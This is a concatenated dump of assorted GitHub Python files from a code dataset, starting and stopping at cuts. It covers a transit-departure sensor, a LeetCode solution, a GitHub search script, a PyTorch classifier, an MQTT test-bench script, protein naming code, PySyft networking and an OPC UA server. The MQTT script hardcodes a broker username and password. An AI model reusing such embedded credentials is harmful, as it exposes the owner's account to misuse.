val['next_destination'] = self._board[0]['destination']\r\n val['next_departure'] = self._board[0]['departure']\r\n\r\n if len(self._board) > 1:\r\n val['upcoming_line'] = self._board[1]['line']\r\n val['upcoming_destination'] = self._board[1]['destination']\r\n val['upcoming_departure'] = self._board[1]['departure']\r\n \r\n return val\r\n\r\n def parseDepartureTime(self, t):\r\n \"\"\" weird time formats from the API, do some quick and dirty conversions \"\"\"\r\n\r\n try: \r\n if t == 'Nu':\r\n return 0\r\n\r\n s = t.split()\r\n if(len(s) > 1 and s[1] == 'min'):\r\n return int(s[0])\r\n\r\n s = t.split(':')\r\n if(len(s) > 1):\r\n now = datetime.datetime.now()\r\n min = (int(s[0])*60 + int(s[1])) - (now.hour*60 + now.minute)\r\n if min < 0: \r\n min = min + 1440\r\n return min\r\n\r\n except Exception:\r\n _LOGGER.error('Failed to parse departure time (%s) ', t)\r\n\r\n return 0\r\n \r\n def update(self):\r\n \"\"\"Get the departure board.\"\"\"\r\n\r\n self._data.update()\r\n\r\n board = []\r\n if self._data.data['StatusCode'] != 0:\r\n _LOGGER.error(\"Status code: {}, {}\".format(self._data.data['StatusCode'], self._data.data['Message']))\r\n else:\r\n for i,traffictype in enumerate(['Metros','Buses','Trains','Trams', 'Ships']):\r\n for idx, value in enumerate(self._data.data['ResponseData'][traffictype]):\r\n direction = value['JourneyDirection'] or 0\r\n displaytime = value['DisplayTime'] or ''\r\n destination = value['Destination'] or ''\r\n linenumber = value['LineNumber'] or ''\r\n \r\n if (int(self._data._direction) == 0 or int(direction) == int(self._data._direction)):\r\n if(self._data._lines is None or (linenumber in self._data._lines)):\r\n diff = self.parseDepartureTime(displaytime)\r\n board.append({\"line\":linenumber,\"departure\":displaytime,\"destination\":destination, 'time': diff})\r\n \r\n self._board = sorted(board, key=lambda k: k['time'])\r\n\r\n _LOGGER.info(self._board)\r\n\r\n \r\nclass SlDepartureBoardData(object):\r\n \"\"\" Class for retrieving API data \"\"\"\r\n def __init__(self, apikey, siteid, lines, direction):\r\n \"\"\"Initialize the data object.\"\"\"\r\n self._apikey = apikey\r\n self._siteid = siteid\r\n self._lines = lines \r\n self._direction = direction or 0\r\n self.data = {}\r\n\r\n @Throttle(UPDATE_FREQUENCY, FORCED_UPDATE_FREQUENCY)\r\n def update(self, **kwargs):\r\n \"\"\"Get the latest data for this site from the API.\"\"\"\r\n try:\r\n _LOGGER.info(\"fetching SL Data for '%s'\", self._siteid)\r\n url = \"https://api.sl.se/api2/realtimedeparturesV4.json?key={}&siteid={}\". \\\r\n format(self._apikey, self._siteid)\r\n\r\n req = requests.get(url, headers={\"User-agent\": USER_AGENT}, allow_redirects=True, timeout=5)\r\n\r\n except requests.exceptions.RequestException:\r\n _LOGGER.error(\"failed fetching SL Data for '%s'\", self._siteid)\r\n return\r\n\r\n if req.status_code == 200:\r\n self.data = req.json()\r\n\r\n else:\r\n _LOGGER.error(\"failed fetching SL Data for '%s'\"\r\n \"(HTTP Status_code = %d)\", self._siteid,\r\n req.status_code) \r\n\r\n","repo_name":"fuffenz/ha-sensor-sl","sub_path":"sl.py","file_name":"sl.py","file_ext":"py","file_size_in_byte":6814,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"52"} +{"seq_id":"71045613286","text":"# Given a string s which consists of lowercase or uppercase letters, return the \n# length of the longest palindrome that can be built with those letters. \n# \n# Letters are case sensitive, for example, \"Aa\" is not considered a palindrome \n# here. \n# \n# \n# Example 1: \n# \n# \n# Input: s = \"abccccdd\"\n# Output: 7\n# Explanation:\n# One longest palindrome that can be built is \"dccaccd\", whose length is 7.\n# \n# \n# Example 2: \n# \n# \n# Input: s = \"a\"\n# Output: 1\n# \n# \n# Example 3: \n# \n# \n# Input: s = \"bb\"\n# Output: 2\n# \n# \n# \n# Constraints: \n# \n# \n# 1 <= s.length <= 2000 \n# s consists of lowercase and/or uppercase English letters only. \n# \n# Related Topics Hash Table String Greedy ðŸ‘� 2752 👎 161\nimport collections\nfrom typing import List, Optional\nfrom dataStructure.ListNode import ListNode\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nclass Solution:\n def longestPalindrome(self, s: str) -> int:\n count = collections.Counter(s)\n ans = 0\n for alp, num in count.items():\n if num % 2 == 0:\n ans += num\n else:\n ans += num - 1\n if len(s) == ans:\n return ans\n else:\n return ans + 1\n\n\n# leetcode submit region end(Prohibit modification and deletion)\n\n\nif __name__ == '__main__':\n a = Solution()\n print(a.longestPalindrome(s=\"abccccdd\"))\n","repo_name":"ChaunceyBai98/LeetCodePython","sub_path":"leetcode/editor/en/[409]Longest Palindrome.py","file_name":"[409]Longest Palindrome.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40344796228","text":"import sys, argparse, requests, json\r\n\r\ndef main(argv):\r\n keyword = ''\r\n limit = ''\r\n \r\n # Setting command line input parameters.\r\n parser = argparse.ArgumentParser(description=\"Get repositories info based on keyword and limit (number of repositories returned)\")\r\n parser.add_argument('keyword', help='The string keyword to search repositories for, e.g: \"search abc\"')\r\n parser.add_argument('limit', type=int, help='Number of repositories returned ( 1 <= limit <= 100)')\r\n args = parser.parse_args()\r\n \r\n keyword = args.keyword\r\n limit = args.limit\r\n\r\n # Execute GET request with specified keyword and limit\r\n get(keyword, limit)\r\n\r\n# Helper to submit the GET request.\r\ndef get(keyword, limit):\r\n \r\n # Build the request URI.\r\n uri = \"https://api.github.com/search/repositories?q={0}&sort=forks&order=desc&per_page={1}\".format(keyword, limit)\r\n\r\n # Set the json result.\r\n jsonResult = {}\r\n \r\n # Submit request if limit is valid.\r\n if (limit <= 0 or limit > 100):\r\n jsonResult['error'] = 'Limit must be between 1 and 100!'\r\n else:\r\n getResult = requests.get(uri).json()\r\n \r\n # Build the json result\r\n jsonResult['keyword'] = keyword\r\n jsonResult['desired_repositories_number'] = limit\r\n \r\n # Get all the repository items.\r\n items = getResult[\"items\"]\r\n \r\n jsonResult['returned_repositories_number'] = len(items)\r\n repos = []\r\n # Build details for each item.\r\n for item in items:\r\n details = {}\r\n details[\"id\"] = item[\"id\"]\r\n details[\"name\"] = item[\"name\"]\r\n details[\"description\"] = item[\"description\"]\r\n details[\"language\"] = item[\"language\"]\r\n details[\"created_date\"] = item[\"created_at\"]\r\n details[\"html_url\"] = item[\"html_url\"]\r\n details[\"watchers\"] = item[\"watchers_count\"]\r\n details[\"forks\"] = item[\"forks_count\"]\r\n details[\"owner_username\"] = item[\"owner\"][\"login\"]\r\n details[\"owner_id\"] = item[\"owner\"][\"id\"]\r\n details[\"owner_html_url\"] = item[\"owner\"][\"html_url\"]\r\n repos.append(details)\r\n \r\n jsonResult[\"repositories\"] = repos\r\n \r\n print (json.dumps(jsonResult, indent = 3))\r\n\r\nif __name__ == \"__main__\":\r\n main(sys.argv[1:])","repo_name":"steventhai/test","sub_path":"repos.py","file_name":"repos.py","file_ext":"py","file_size_in_byte":2387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42275344670","text":"import numpy\nimport pytorch_lightning as pl\nimport torch\nimport torch.nn as nn\n\n\nclass LinearClassifier(pl.LightningModule):\n def __init__(self, hparams, train_dataset, val_dataset, test_dataset):\n super().__init__()\n\n def initialize_weights(m):\n if type(m) == nn.Linear:\n torch.nn.init.xavier_normal_(m.weight)\n elif type(m) == nn.Conv2d:\n torch.nn.init.xavier_normal_(m.weight)\n\n self.save_hyperparameters(hparams)\n\n self.train_dataset = train_dataset\n self.val_dataset = val_dataset\n self.test_dataset = test_dataset\n\n in_features = hparams.get('input_features', 1000)\n out_features = hparams.get('output_features', 10)\n act_fn = self.get_activation_function(hparams['activation_function'])\n\n layers = []\n layers.extend([\n nn.Linear(in_features, 1000),\n act_fn,\n nn.Linear(1000, 1000),\n act_fn,\n nn.Linear(1000, 100),\n act_fn,\n nn.Linear(100, out_features),\n nn.Softmax()\n ])\n\n for layer in layers:\n layer.apply(initialize_weights)\n self.model = nn.Sequential(*layers)\n\n pl.Trainer()\n\n def forward(self, x):\n x = self.model(x)\n return x\n\n @staticmethod\n def get_activation_function(func_str):\n switch = {\n 'ReLU': nn.ReLU(),\n 'LeakyReLU': nn.LeakyReLU(),\n 'Sigmoid': nn.Sigmoid(),\n 'Tanh': nn.Tanh(),\n }\n return switch.get(func_str, nn.LeakyReLU())\n\n def general_step(self, batch):\n images, targets = batch\n flattened_images = images.view(images.shape[0], -1)\n out = self.forward(flattened_images)\n loss = nn.functional.cross_entropy(out, targets)\n\n return loss\n\n def training_step(self, batch):\n loss = self.general_step(batch)\n self.log(\"train_loss\", loss)\n return loss\n\n def validation_step(self, batch, batch_idx):\n loss = self.general_step(batch)\n self.log(\"val_loss\", loss)\n return loss\n\n def test_step(self, batch, batch_idx):\n loss = self.general_step(batch)\n self.log(\"test_loss\", loss)\n return loss\n\n # implement _end functions\n\n def train_dataloader(self):\n return torch.utils.data.DataLoader(self.train_dataset, shuffle =True, batch_size=self.hparams['batch_size'], num_workers=4)\n\n def val_dataloader(self):\n return torch.utils.data.DataLoader(self.val_dataset, shuffle =True, batch_size=self.hparams['batch_size'], num_workers=4)\n\n def test_dataloader(self):\n return torch.utils.data.DataLoader(self.test_dataset, shuffle =True, batch_size=self.hparams['batch_size'], num_workers=4)\n\n def configure_optimizers(self):\n optim = torch.optim.Adam(self.model.parameters(), lr = self.hparams['lr'])\n return optim","repo_name":"AjayDextrous/AI-Experiments","sub_path":"models/linear_classifier.py","file_name":"linear_classifier.py","file_ext":"py","file_size_in_byte":2930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40598140342","text":"# auto_data_acq.py\nimport sys, os\nfrom testbench_PLC import surf_temp_calib\nimport paho.mqtt.client as mqtt\nimport time\nfrom datetime import datetime\n\n\nbroker_address = \"72bcebd3aeb4444586a7c1152291630d.s1.eu.hivemq.cloud\"\nbroker_port = 8883\n\nclient = mqtt.Client(client_id=\"MBP_mxu\", clean_session=True)\nclient.will_set(\"Rkl/testbench/launcher/status\", payload=\"Status: OFF\", retain=True)\n\n\ndef on_connect(client, userdata, flags, rc):\n if rc == 0:\n print(\"connected to MQTT server\")\n else:\n print(f\"connect failed with code {rc}\")\n\n\ndef run():\n other_temp = 35\n targ_temp = 35\n client.on_connect = on_connect\n # enable TLS for secure connection\n client.tls_set(tls_version=mqtt.ssl.PROTOCOL_TLS)\n # set username and password\n while True:\n try:\n client.username_pw_set(\"MBP_minsheng\", \"Hive001601027\")\n client.connect(broker_address, broker_port, 7200) # keep_alive must be greater than hold+write time?\n '''\n auto. publish plan:\n In every 50min:\n 1. adjust the supply temperature set of 1150, from 15°C to 45°C in step of 5 K\n 2. run the script surf_temp_calib.py (last about 10 min)\n After a cycle (15 - 45°C):\n 2. increase the supply temperature set of 10L1-3, 10X123, 1110-1140, 1160, 121A-125A by 15 K\n '''\n supply_temp_set_10L1 = other_temp\n supply_temp_set_10S123 = other_temp\n supply_temp_set_10L2 = other_temp\n supply_temp_set_10L3 = other_temp\n supply_temp_set_1110 = other_temp\n supply_temp_set_1120 = other_temp\n supply_temp_set_1130 = other_temp\n supply_temp_set_1140 = other_temp\n supply_temp_set_1150 = targ_temp\n supply_temp_set_1160 = other_temp\n supply_temp_set_121A = other_temp\n supply_temp_set_122A = other_temp\n supply_temp_set_123A = other_temp\n supply_temp_set_124A = other_temp\n supply_temp_set_125A = other_temp\n print(supply_temp_set_1150)\n client.publish(\"Rkl/WtrSup/zone11/panel_0/fSupTempSet\", supply_temp_set_10L1, qos=0, retain=False)\n client.publish(\"Rkl/WtrSup/zone11/panel_1/fSupTempSet\", supply_temp_set_10S123, qos=0, retain=False)\n client.publish(\"Rkl/WtrSup/zone11/panel_2/fSupTempSet\", supply_temp_set_10L2, qos=0, retain=False)\n client.publish(\"Rkl/WtrSup/zone11/panel_3/fSupTempSet\", supply_temp_set_10L3, qos=0, retain=False)\n client.publish(\"Rkl/WtrSup/zone11/panel_4/fSupTempSet\", supply_temp_set_1110, qos=0, retain=False)\n client.publish(\"Rkl/WtrSup/zone11/panel_5/fSupTempSet\", supply_temp_set_1120, qos=0, retain=False)\n client.publish(\"Rkl/WtrSup/zone11/panel_6/fSupTempSet\", supply_temp_set_1130, qos=0, retain=False)\n client.publish(\"Rkl/WtrSup/zone11/panel_7/fSupTempSet\", supply_temp_set_1140, qos=0, retain=False)\n client.publish(\"Rkl/WtrSup/zone11/panel_8/fSupTempSet\", supply_temp_set_1150, qos=0, retain=False)\n client.publish(\"Rkl/WtrSup/zone11/panel_9/fSupTempSet\", supply_temp_set_1160, qos=0, retain=False)\n client.publish(\"Rkl/WtrSup/zone11/panel_10/fSupTempSet\", supply_temp_set_121A, qos=0, retain=False)\n client.publish(\"Rkl/WtrSup/zone11/panel_11/fSupTempSet\", supply_temp_set_122A, qos=0, retain=False)\n client.publish(\"Rkl/WtrSup/zone11/panel_12/fSupTempSet\", supply_temp_set_123A, qos=0, retain=False)\n client.publish(\"Rkl/WtrSup/zone11/panel_13/fSupTempSet\", supply_temp_set_124A, qos=0, retain=False)\n client.publish(\"Rkl/WtrSup/zone11/panel_14/fSupTempSet\", supply_temp_set_125A, qos=0, retain=False)\n time.sleep(20 * 60)\n print(\"start writing data into .csv file\")\n print(datetime.now())\n\n now = str(datetime.now().strftime(\"%m%d_%H%M\"))\n print(now)\n file_name = \"../Data/\" + now + \"_surf_temp_1150_rec.csv\"\n stop_time = 10 * 60\n write_csv = surf_temp_calib.Write_to_csv(file_name, stop_time)\n write_csv.start_script()\n\n print(\"finish writing data into .csv file\")\n targ_temp += 5\n print(targ_temp, supply_temp_set_1150)\n if supply_temp_set_1150 == 45:\n targ_temp = 15\n other_temp += 5\n if other_temp > 45:\n other_temp = 15\n print(\"achieve the limit of supply temperature, start recording from the min. supply temperature\")\n time.sleep(1 * 60)\n print(\"restart recording data\")\n except Exception as e:\n print(repr(e))\n\n\nif __name__ == '__main__':\n run()\n","repo_name":"Schwarz-XU/MA_IR-Kamera","sub_path":"raspi-mlx90640/DataProcessing/auto_data_acq.py","file_name":"auto_data_acq.py","file_ext":"py","file_size_in_byte":4832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22337457409","text":"n=int(input())\r\ndp=list(range(n+1))\r\nfor i in range(n+1):\r\n six=6\r\n while 0<=(i-six):\r\n dp[i]=min(dp[i],dp[i-six]+1)\r\n six*=6\r\n nine=9\r\n while 0<=(i-nine):\r\n dp[i]=min(dp[i],dp[i-nine]+1)\r\n nine*=9\r\nprint(dp[-1])","repo_name":"5418009ohkawatakahiro/Atcoder","sub_path":"ABC/099/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16578955490","text":"\"\"\"\nNaming algorithm\n\nA best match protein and available proteins are provided in the function.\nIt predicts the next available name.\n\nXpp35Ab1\n ---> 35 ---> rank1_naming [1 to 3 digits]\n ---> A ---> rank2_naming [One uppercase letter]\n ---> b ---> rank3_naming [One lowercase letter]\n ---> 1 ---> rank4_naming [ 1 to 3 digits]\n\"\"\"\n\nimport re\nfrom typing import Iterable\n\n\ndef next_alphabetic_character(character):\n \"\"\"\n Given an alphabet (any upper or lowercase) returns the next alphabet\n\n >>> next_alphabetic_character('A')\n 'B'\n >>> next_alphabetic_character('a')\n 'b'\n \"\"\"\n\n return chr(ord(character) + 1)\n\n\n\ndef rank2_naming(proteins_available: Iterable[str], best_match_protein_name: str) -> str:\n \"\"\"\n Given a list of proteins available as well as the best match name\n the function returns predicted name\n\n In this example the function extracts the first three letter pattern along with the number (it can be 3 to 5 digits)\n from the best match protein name. It filters the pattern from the proteins available.\n It also extracts the uppercase letter from the filtered patterns and finds the highest alphabet. Predict the next alphabet.\n Add the pattern 'Xpp35', predicted uppercase as well as 'a1' to get the name.\n\n Xpp35Ab1\n ---> pattern ---> Xpp35\n ---> Filters the pattern from the proteins available ---> ['Xpp35Aa1', 'Xpp35Ab45','Xpp35Ad1','Xpp35Ba1']\n ---> Extract all the uppercase from the filtered pattern ---> ['A', 'A', 'A', 'B']\n ---> Find the highest alphabet ---> ['B']\n ---> Predict the next alphabet ---> by using the function next_alphabetic_character() ---> ['C']\n ---> predicted name is Xpp35+C+a1 ---> Xpp50Aa1\n\n >>> proteins_available = ('Xpp1Aa1', 'Xpp2Aa1', 'Xpp35Aa1', 'Xpp35Ab45',\n 'Xpp35Ad1','Xpp35Ba1', 'Xpp36Aa1', 'Xpp49Aa1', 'Xpp49Ab1')\n\n >>> best_match_protein_name = 'Xpp35Ab1'\n\n >>> rank2_naming(proteins_available, best_match_protein_name)\n 'Xpp35Ca1'\n\n \"\"\"\n # extract the three-letter pattern with number Xpp35\n protein_pattern = re.search(r\"[A-Z][a-z]{2}\\d{1,3}\", best_match_protein_name).group()\n\n #re.compile('Xpp35([A-Z])')\n base_pattern = re.compile('{}([A-Z])'.format(protein_pattern))\n\n #Available candidates ['A', 'A', 'A', 'B']\n candidates = []\n for name in proteins_available:\n candidate = base_pattern.search(name)\n if candidate:\n candidates.append(candidate.group(1))\n\n #best candidate in this example 'B'\n best_candidate = max(candidates)\n\n #next letter in this example 'C'\n new_letter = next_alphabetic_character(best_candidate)\n\n #Add the protein pattern, the next predicted letter and 'a1' at the suffix\n #predicted name Xpp35Ca1\n return f'{protein_pattern}{new_letter}a1'\n\ndef rank3_naming(proteins_available: Iterable[str], best_match_protein_name: str) -> str:\n \"\"\"\n Given a list of proteins available as well as the best match name\n the function returns predicted name\n\n In this example the function extracts the first three letter pattern with the number (it can be 3 to 5 digits)\n and uppercase (1 letter) from the best match protein name. It filters the pattern from the proteins available.\n It also extracts the lower letter from the filtered patterns. Predict the next alphabet.\n Add the pattern 'Xpp35A', predicted lowercase as well as '1' digit to get the name.\n\n Xpp35Ab1\n ---> pattern ---> Xpp35A\n ---> Filters the pattern from the proteins available ---> ['Xpp35Aa1', 'Xpp35Ab45','Xpp35Ad1']\n ---> Extract all the lowercase from the filtered pattern ---> ['a', 'b', 'd']\n ---> Find the highest alphabet ---> ['d']\n ---> Predict the next alphabet ---> by using the function next_alphabetic_character() ---> ['e']\n ---> predicted name is Xpp35+C+a1 ---> Xpp50Aa1\n\n >>> proteins_available = ('Xpp1Aa1', 'Xpp2Aa1', 'Xpp35Aa1', 'Xpp35Ab45',\n 'Xpp35Ad1','Xpp35Ba1', 'Xpp36Aa1', 'Xpp49Aa1', 'Xpp49Ab1')\n\n >>> best_match_protein_name = 'Xpp35Ab1'\n\n >>> rank3_naming(proteins_available, best_match_protein_name)\n 'Xpp35Ae1'\n\n \"\"\"\n # extract the three-letter pattern Xpp35A from best_match_protein_name Xpp35Ab1\n protein_pattern = re.search(r\"[A-Z][a-z]{2}\\d{1,3}[A-Z]\", best_match_protein_name).group()\n\n # re.compile('Xpp35A([a-z])')\n base_pattern = re.compile('{}([a-z])'.format(protein_pattern))\n\n # ['a', 'b', 'd']\n candidates = []\n for name in proteins_available:\n candidate = base_pattern.search(name)\n if candidate:\n candidates.append(candidate.group(1))\n\n # 'd'\n best_candidate = max(candidates)\n\n # 'e'\n new_letter = next_alphabetic_character(best_candidate)\n\n #Add the protein pattern, the next predicted letter and 'a1' at the suffix\n #Xpp35Ae1\n return f'{protein_pattern}{new_letter}1'\n\ndef rank4_naming(proteins_available: Iterable[str], best_match_protein_name: str) -> str:\n \"\"\"\n Given a list of proteins available as well as the best match name\n the function returns predicted name\n\n In this example the function extracts the first three letter pattern with the number (it can be 3 to 5 digits),\n uppercase (1 letter) and a lowercase letter from the best match protein name. It filters the pattern from the proteins available.\n It also extracts the last digits (1 to 3) from the filtered patterns. Predict the next available lowercase name.\n Add the pattern 'Xpp35Ab' as well as '1' digit to get the name.\n\n Xpp35Ab1\n ---> pattern ---> Xpp35Ab\n ---> Filters the pattern from the proteins available ---> ['Xpp35Ab45']\n ---> Extract the last digits 45\n ---> Add 45 + 1 = 46\n ---> predicted name is Xpp35Ab+46 ---> Xpp35Ab46\n\n\n >>> proteins_available = ('Xpp1Aa1', 'Xpp2Aa1', 'Xpp35Aa1', 'Xpp35Ab45',\n 'Xpp35Ad1','Xpp35Ba1', 'Xpp36Aa1', 'Xpp49Aa1', 'Xpp49Ab1')\n\n >>> best_match_protein_name = 'Xpp35Ab1'\n\n >>> rank4_naming(proteins_available, best_match_protein_name)\n 'Xpp35Ab46'\n\n \"\"\"\n # extract the pattern Xpp35Ab from the best_match_protein_name Xpp35Ab1\n protein_pattern = re.search(r\"[A-Z][a-z]{2}\\d{1,3}[A-Z][a-z]\", best_match_protein_name).group()\n\n # re.compile('Xpp35Ab(\\\\d{1,3})')\n base_pattern = re.compile(r'{}(\\d{{1,3}})'.format(protein_pattern))\n\n # ['45']\n candidates = []\n for name in proteins_available:\n candidate = base_pattern.search(name)\n if candidate:\n candidates.append(candidate.group(1))\n # 45\n best_candidate = int(max(candidates))\n\n # Add the protein pattern, the next predicted letter and 'a1' at the suffix\n # Xpp35Ab46\n return f'{protein_pattern}{best_candidate+1}'\n\n# def main():\n#\n# proteins_available = ('Xpp1Aa1', 'Xpp2Aa1', 'Xpp35Aa1', 'Xpp35Ab45', 'Xpp35Ad1',\n# 'Xpp35Ba1', 'Xpp36Aa1', 'Xpp49Aa1', 'Xpp49Ab1')\n# best_match_protein_name = 'Xpp35Ab1'\n# predicted_name = rank4_naming(proteins_available, best_match_protein_name)\n\n# if __name__ == '__main__':\n#\n","repo_name":"Amrithasuresh/BPPRC_v1","sub_path":"naming_package/naming.py","file_name":"naming.py","file_ext":"py","file_size_in_byte":7113,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"70315716646","text":"from typing import List\n\n\n# 方法1-\nclass Solution1:\n def findMinArrowShots(self, points: List[List[int]]) -> int:\n points.sort(key=lambda x: x[0])\n num_arrows = 1\n for i in range(len(points) - 1):\n if points[i][1] < points[i+1][0]:\n num_arrows += 1\n else:\n points[i+1][1] = min(points[i][1], points[i+1][1])\n return num_arrows\n\n\n\n\nif __name__ == '__main__':\n points1 = [[10, 16], [2, 8], [1, 6], [7, 12]]\n points2 = [[1, 2], [3, 4], [5, 6], [7, 8]]\n points3 = [[1, 2], [2, 3], [3, 4], [4, 5]]\n points4 = [[1, 2]]\n points5 = [[2, 3], [2, 3]]\n s = Solution1()\n print(s.findMinArrowShots(points1))\n print(s.findMinArrowShots(points2))\n print(s.findMinArrowShots(points3))\n print(s.findMinArrowShots(points4))\n print(s.findMinArrowShots(points5))","repo_name":"cxiaolong/Algorithm-Practice","sub_path":"PythonEdition/贪心算法/452_findMinArrowShots.py","file_name":"452_findMinArrowShots.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70564648804","text":"# stdlib\nimport os\nfrom typing import Any\nfrom typing import Dict\nfrom typing import List\nfrom typing import Optional\nfrom typing import Union\n\n# third party\nimport ascii_magic\nfrom nacl.signing import SigningKey\nfrom nacl.signing import VerifyKey\n\n# relative\nfrom ....lib.python import String\nfrom ....logger import error\nfrom ...common.message import SignedMessage\nfrom ...common.message import SyftMessage\nfrom ...common.uid import UID\nfrom ...io.location import Location\nfrom ...io.location import SpecificLocation\nfrom ..common.node import Node\nfrom ..common.node_manager.association_request_manager import AssociationRequestManager\nfrom ..common.node_manager.group_manager import GroupManager\nfrom ..common.node_manager.role_manager import RoleManager\nfrom ..common.node_manager.user_manager import UserManager\nfrom ..common.node_service.association_request.association_request_service import (\n AssociationRequestService,\n)\nfrom ..common.node_service.node_setup.node_setup_service import NodeSetupService\nfrom ..common.node_service.request_receiver.request_receiver_messages import (\n RequestMessage,\n)\nfrom ..common.node_service.role_manager.role_manager_service import RoleManagerService\nfrom ..common.node_service.user_manager.user_manager_service import UserManagerService\nfrom ..domain.client import DomainClient\nfrom ..domain.domain import Domain\nfrom .client import NetworkClient\n\n\nclass Network(Node):\n\n network: SpecificLocation\n\n child_type = Domain\n client_type = NetworkClient\n child_type_client_type = DomainClient\n\n def __init__(\n self,\n name: Optional[str],\n network: SpecificLocation = SpecificLocation(),\n domain: Optional[Location] = None,\n device: Optional[Location] = None,\n vm: Optional[Location] = None,\n signing_key: Optional[SigningKey] = None,\n verify_key: Optional[VerifyKey] = None,\n root_key: Optional[VerifyKey] = None,\n db_engine: Any = None,\n db: Any = None,\n ):\n super().__init__(\n name=name,\n network=network,\n domain=domain,\n device=device,\n vm=vm,\n signing_key=signing_key,\n verify_key=verify_key,\n db_engine=db_engine,\n db=db,\n )\n\n # specific location with name\n self.network = SpecificLocation(name=self.name)\n self.root_key = root_key\n\n # Database Management Instances\n self.users = UserManager(db_engine)\n self.roles = RoleManager(db_engine)\n self.groups = GroupManager(db_engine)\n self.association_requests = AssociationRequestManager(db_engine)\n\n # Grid Network Services\n self.immediate_services_with_reply.append(AssociationRequestService)\n self.immediate_services_with_reply.append(NodeSetupService)\n self.immediate_services_with_reply.append(RoleManagerService)\n self.immediate_services_with_reply.append(UserManagerService)\n\n self.requests: List[RequestMessage] = list()\n # available_device_types = set()\n # TODO: add available compute types\n\n # default_device = None\n # TODO: add default compute type\n\n self._register_services()\n self.request_handlers: List[Dict[Union[str, String], Any]] = []\n self.handled_requests: Dict[Any, float] = {}\n\n self.post_init()\n\n def post_init(self) -> None:\n super().post_init()\n self.set_node_uid()\n\n def loud_print(self) -> None:\n install_path = os.path.abspath(\n os.path.join(os.path.realpath(__file__), \"../../../../img/\")\n )\n ascii_magic.to_terminal(\n ascii_magic.from_image_file(\n img_path=install_path + \"/pygrid.png\", columns=83\n )\n )\n\n print(\n r\"\"\"\n |\\ | _ |_ _ _ |\n | \\| (- |_ \\)/ (_) | |(\n\"\"\"\n )\n\n @property\n def icon(self) -> str:\n return \"🔗\"\n\n @property\n def id(self) -> UID:\n return self.network.id\n\n def message_is_for_me(self, msg: Union[SyftMessage, SignedMessage]) -> bool:\n # this needs to be defensive by checking network_id NOT network.id or it breaks\n try:\n return msg.address.network_id == self.id and msg.address.domain is None\n except Exception as e:\n error(f\"Error checking if {msg.pprint} is for me on {self.pprint}. {e}\")\n return False\n","repo_name":"datax-io/pysyft-parcel","sub_path":"packages/syft/src/syft/core/node/network/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":4535,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"39456388576","text":"import socket\n\nss = socket.socket()\nprint('Socket Created')\n\nss.bind(('localhost', 9999))\n\nss.listen(3)\nprint('Waiting for connections')\n\nwhile True:\n cs, addr = ss.accept()\n name = cs.recv(1024).decode()\n print(\"Connected with\", addr, name)\n\n cs.send(bytes(\"Welcome to Liopun\", 'utf-8'))\n\n cs.close()","repo_name":"Liopun/py3","sub_path":"projects/sockets/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32220388285","text":"import time\r\nimport random\r\nimport logging\r\nfrom opcua import Server\r\nfrom threading import Thread\r\n\r\n\r\nclass VarUpdater(Thread):\r\n def __init__(self, temp, timeWork):\r\n Thread.__init__(self)\r\n self.stopMark = False\r\n self.temp = temp\r\n self.timeWork = timeWork\r\n\r\n # Функция меняет значения марекра остановки\r\n def stop(self):\r\n self.stopMark = True\r\n\r\n # Функция устанавливает значения для температуры и времени работы\r\n def run(self):\r\n startTime = time.time()\r\n while not self.stopMark:\r\n self.temp.set_value(random.randint(56, 60))\r\n self.timeWork.set_value(\"{0:.0f}:{1:02.0f}:{2:02.0f}\".format(\r\n (time.time() - startTime)//3600,\r\n (time.time() - startTime)//60 % 60,\r\n (time.time() - startTime) % 60))\r\n time.sleep(0.1)\r\n\r\n\r\ntry:\r\n from IPython import embed\r\nexcept ImportError:\r\n import code\r\n # запускает интерактивную консоль\r\n def embed():\r\n myvars = globals()\r\n myvars.update(locals())\r\n shell = code.InteractiveConsole(myvars)\r\n shell.interact()\r\n\r\n# Останавливает работу сервера и работу потоков, в которых устанавливается значение температуры и времени\r\ndef stop_server():\r\n sensor_1Updater.stop()\r\n sensor_2Updater.stop()\r\n sensor_3Updater.stop()\r\n server.stop()\r\n print(\"The server has stopped\")\r\n\r\n# Запускает работу сервера и работу потоков, в которых устанавливается значение температуры и времени\r\ndef start_server():\r\n server.start()\r\n sensor_1Updater.start()\r\n sensor_2Updater.start()\r\n sensor_3Updater.start()\r\n print(\"The server is up\")\r\n\r\n\r\nlogging.basicConfig(\r\n format=u'[LINE:%(lineno)d]# %(levelname)-8s [%(asctime)s] %(message)s',\r\n level=logging.ERROR)\r\nserver = Server()\r\nserver.set_endpoint(\"opc.tcp://localhost:4840\")\r\n\r\nuri = \"MyServerOPC\"\r\nidx = server.register_namespace(uri)\r\nnode = server.get_objects_node()\r\n\r\nsensor_1 = node.add_object(idx, \"Sensor_1\")\r\ntemp_s1 = sensor_1.add_variable(idx, \"Tempreture\", 0)\r\nvelocity_s1 = sensor_1.add_variable(idx, \"Velocity\", 0)\r\nvelocity_s1.set_writable()\r\nforce_s1 = sensor_1.add_variable(idx, \"Force\", 0)\r\nforce_s1.set_writable()\r\ntime_s1 = sensor_1.add_variable(idx, \"Time\", 0)\r\n\r\nsensor_2 = node.add_object(idx, \"Sensor_2\")\r\ntemp_s2 = sensor_2.add_variable(idx, \"Tempreture\", 0)\r\nvelocity_s2 = sensor_2.add_variable(idx, \"Velocity\", 